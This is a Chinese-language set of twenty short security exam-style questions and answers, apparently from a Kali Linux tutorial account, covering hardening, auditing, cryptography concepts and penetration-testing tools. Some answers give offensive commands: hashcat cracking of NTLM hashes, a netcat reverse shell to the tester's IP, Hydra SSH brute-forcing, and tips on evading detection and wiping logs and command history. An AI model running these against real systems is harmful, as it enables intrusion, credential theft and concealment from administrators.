摘要：使用Hashcat破解密码哈希，先准备好哈希文件和字典文件。在Kali Linux终端输入“hashcat -m [哈希类型] -a [攻击模式] [哈希文件路径] [字典文件路径]”。常用参数中，“-m”指定哈希类型，如“1000”代表NTLM哈希类型；“-

1.简述在Kali Linux中使用hashcat进行密码哈希破解的方法及常用参数。

使用Hashcat破解密码哈希，先准备好哈希文件和字典文件。在Kali Linux终端输入“hashcat -m [哈希类型] -a [攻击模式] [哈希文件路径] [字典文件路径]”。常用参数中，“-m”指定哈希类型，如“1000”代表NTLM哈希类型；“-a”指定攻击模式，0为字典攻击，1为组合攻击等。例如破解NTLM哈希，若哈希文件为“hashes.txt”，字典为“passwords.txt”，则命令为“hashcat -m 1000 -a 0 hashes.txt passwords.txt”，Hashcat会根据设置的参数利用字典对哈希进行破解。

2.简述Windows系统中远程桌面服务的安全风险及防范措施。

安全风险有：若使用弱密码，易遭暴力破解；开放远程桌面端口（默认3389），易成为攻击目标；可能存在远程桌面相关漏洞被利用。防范措施：设置强密码，开启账户锁定策略；修改远程桌面默认端口，减少被扫描到几率；及时更新系统补丁修复相关漏洞；通过防火墙限制远程桌面访问来源，只允许信任IP连接。

3. 简述零知识证明的概念及其在密码安全中的应用场景。

零知识证明是一方（证明者）向另一方（验证者）证明自己知道某信息，但不泄露该信息内容。如证明者知道密码锁密码，通过特定交互让验证者相信其知道密码，却不透露密码。在密码安全中，应用于身份验证，用户可零知识证明自己身份，不泄露密码等敏感信息。还用于隐私保护场景，如区块链中验证交易合法性同时保护交易隐私，增强安全性和隐私性。

4.在 Linux 系统中，如何保护无线网络连接安全？

使用 WPA2 或更高级别的加密协议，如 WPA2 - PSK（针对家庭网络），设置高强度密码，包含大小写字母、数字和特殊字符。隐藏无线网络的 SSID，减少被扫描发现几率，但可能影响部分设备自动连接。禁用无线网络的 WPS 功能，因其存在安全漏洞易被破解。定期更新无线路由器固件，修复安全漏洞。同时，在 Linux 系统中，连接无线网络时确认网络来源，避免连接钓鱼 WiFi。

5.简述密码疲劳的概念及其对密码安全的影响，如何缓解？

密码疲劳指用户因需记忆大量密码，产生厌烦和压力，导致采取不安全密码管理行为。影响是用户常重复使用密码或设置简单密码，增加密码泄露风险，一个账户泄露可能导致多个账户受威胁。缓解方法是使用密码管理器，自动生成、存储和填充密码，用户只需记住一个主密码。企业实施单点登录（SSO），用户用一组凭证访问多个系统，减少密码数量，降低密码疲劳。

6.Kali Linux中的Netcat工具用途广泛，如何利用它建立简单的反向Shell？

在Kali Linux上作为接收端，先开启监听，如监听8888端口，在终端输入“nc -lvp 8888”。“-l”表示监听模式，“-v”显示详细信息，“-p”指定端口。在目标主机（假设可执行命令）上执行“nc -e /bin/sh [Kali Linux IP] 8888”，“-e”指定执行的程序，这里是“/bin/sh”，即生成一个Shell会话，连接到Kali Linux指定IP和端口。若目标主机是Windows系统，可使用“nc.exe -e cmd.exe [Kali Linux IP] 8888”（需有nc.exe程序），从而在Kali Linux端获得目标主机的Shell权限。

7.Linux 系统中如何防范 ARP 欺骗攻击？

静态绑定 ARP 表，通过 arp -s [IP地址] [MAC地址] 命令将网关或重要主机的 IP 与 MAC 地址绑定，防止 ARP 表被篡改。安装 ARP 防护工具，如 arpwatch，它监控网络中的 ARP 活动，发现异常 ARP 请求或响应及时报警。在网络设备（如交换机）上配置端口安全，绑定端口与 MAC 地址，限制 ARP 包来源，阻止 ARP 欺骗包传播，保护网络通信安全。

8.解释多方计算的概念及其在密码安全中的重要性。

多方计算允许多个参与方在不泄露各自隐私数据前提下，共同计算某个函数。例如多个医疗机构在不公开患者数据情况下统计疾病发生率。在密码安全中重要性在于保护数据隐私，参与方数据始终加密，计算过程也对数据隐私保护。促进数据共享，因隐私保护，各方更愿意共享数据用于计算，如联合数据分析、金融风控等场景，平衡数据利用与隐私保护。

9.在物联网环境中，密码安全面临哪些挑战，如何应对？

挑战有设备资源受限，难运行复杂加密算法和存储大密钥。设备数量多，密钥管理复杂，易泄露。物联网通信协议多样，安全标准不统一。应对措施是采用轻量级加密算法，适合资源受限设备。构建高效密钥管理系统，如基于身份的加密，简化密钥管理。推动统一安全标准制定，保障不同设备和系统安全通信，提高物联网整体密码安全性。

10.Linux 系统中如何检测和防范恶意软件（如病毒、木马）？

可使用 ClamAV 等杀毒软件，先更新病毒库，如 freshclam，然后执行全盘扫描 clamscan -r /。还可通过检查文件完整性，如 rpm -Va（针对 RPM 包管理系统）或 dpkg -V（针对 Debian 系统），查看文件是否被篡改。留意系统资源异常占用，用 top 命令观察 CPU、内存使用情况，发现异常进程深入分析。同时，从正规渠道获取软件，避免下载和运行不明来源程序，降低感染风险。

11.在Kali Linux中进行无线渗透测试时，如何防止被发现？

选择合适的时间进行测试，如深夜网络使用低谷期，减少被注意的概率。调整无线网卡发射功率，降低信号强度，避免信号过强引起怀疑，但要确保能有效捕获所需数据。使用隐藏SSID的无线网络进行测试，降低被扫描工具发现的可能性。在工具使用上，配置工具减少特征暴露，如修改Aircrack - ng工具的默认标识。同时，避免长时间对同一目标进行高强度攻击，防止引起网络管理员警觉。

12.在Kali Linux渗透测试过程中，如何隐藏自己的踪迹？

在利用工具进行攻击时，避免使用默认配置和明显特征，如修改Metasploit框架的Payload生成参数，避免生成具有明显特征的恶意文件。使用完工具后，清除相关日志，如删除Nmap扫描日志、Metasploit操作日志等。对于获取权限后在目标系统留下的操作痕迹，尽量还原系统状态，删除临时文件、清除命令历史记录等。还可使用代理服务器或VPN隐藏自己的真实IP地址，增加追踪难度，但要注意合法性。

13.Windows系统中的UAC（用户账户控制）是什么，有什么作用？

UAC是Windows系统的安全机制。当程序试图进行影响系统设置等关键操作时，UAC会弹出提示框，要求用户确认或输入管理员密码。它可防止恶意程序在用户不知情时进行危险操作，提高系统安全性。普通用户日常操作在标准权限下进行，需提升权限时通过UAC确认，避免恶意软件自动获取高权限破坏系统。

14.Linux 系统中如何审计用户对敏感文件的访问？

对于基于 SELinux 的系统，可通过审计规则定义对敏感文件的访问审计。如使用 auditctl 命令，auditctl -w /path/to/sensitive/file -p rwxa -k sensitive_file_access 表示对指定敏感文件的读（r）、写（w）、执行（x）和属性更改（a）操作进行审计，-k 标记方便后续查询。对于其他系统，可利用文件系统自带功能，如在 ext4 文件系统中，挂载时使用 audit 选项。通过查看 /var/log/audit/audit.log 等审计日志分析访问情况。

15.如何在 Linux 系统中防范缓冲区溢出攻击？

启用编译器的安全选项，如 GCC 编译器的 -fstack - protector 选项，它在栈上插入金丝雀值，检测栈溢出。保持系统和软件更新，许多缓冲区溢出漏洞通过更新修复。编写安全代码，避免使用不安全函数，如 strcpy，改用 strncpy 等安全版本。开启地址空间布局随机化（ASLR），通过 /proc/sys/kernel/randomize_va_space 设置，使程序运行时内存地址随机化，增加攻击难度。

16.简述 Linux 系统中 SUID 和 SGID 的作用，以及可能带来的安全风险。

SUID（Set User ID）使程序以文件所有者的权限运行，SGID（Set Group ID）让程序以文件所属组的权限运行。例如，/usr/bin/passwd 文件设置了 SUID，普通用户执行它时就能以 root 权限修改密码。但这也存在风险，若设置了 SUID 或 SGID 的程序存在漏洞，攻击者可利用该程序获取高权限，比如通过缓冲区溢出攻击，以程序所有者或所属组权限执行恶意代码，威胁系统安全。

17.Kali Linux下的Hydra工具主要用于什么，如何针对SSH服务进行暴力破解？

Hydra是一款强大的密码破解工具，主要用于对多种网络服务进行暴力破解。针对SSH服务，在Kali Linux终端输入“hydra -l [用户名] -P [密码字典路径] [目标IP] ssh”。“-l”指定用户名，“-P”指定密码字典，若不知道用户名，也可用“-L [用户名字典路径]”指定用户名字典。执行命令后，Hydra会尝试字典中的用户名和密码组合，直到破解成功或遍历完字典。

18.解释公钥基础设施（PKI）的概念及其组成部分。

公钥基础设施是一套支持公钥加密和数字证书的体系，保障网络安全通信。组成部分有证书颁发机构（CA），负责验证实体身份并颁发数字证书；注册机构（RA）辅助CA收集信息、验证身份；证书库存储数字证书，供各方查询；证书撤销列表（CRL）或在线证书状态协议（OCSP）机制，用于撤销和查询已撤销证书。用户通过信任CA，验证数字证书合法性，实现安全通信、身份认证等。

19.在Windows系统中，如何检测和清除恶意软件？

首先，使用杀毒软件进行全盘扫描，如Windows Defender或第三方杀毒软件，杀毒软件通过病毒特征库识别恶意软件并清除。若怀疑系统感染恶意软件但杀毒软件未检测到，可运行系统自带的恶意软件删除工具（在系统更新目录中）。还能通过进程管理器查看异常进程，结合文件路径定位并手动删除相关恶意文件，同时清理注册表中恶意软件残留项。

20.如何在Windows系统中审计用户对敏感文件的访问？

先对敏感文件设置审核。右键文件属性，在“安全”选项卡点击“高级”，进入“审核”选项卡添加要审核的用户或组，选择如读取、写入、删除等操作。然后在组策略中，启用“审核对象访问”策略，路径为“计算机配置\Windows设置\安全设置\本地策略\审核策略”。之后通过事件查看器中的安全日志，查看用户对敏感文件的访问记录。

来源：Kali与编程一点号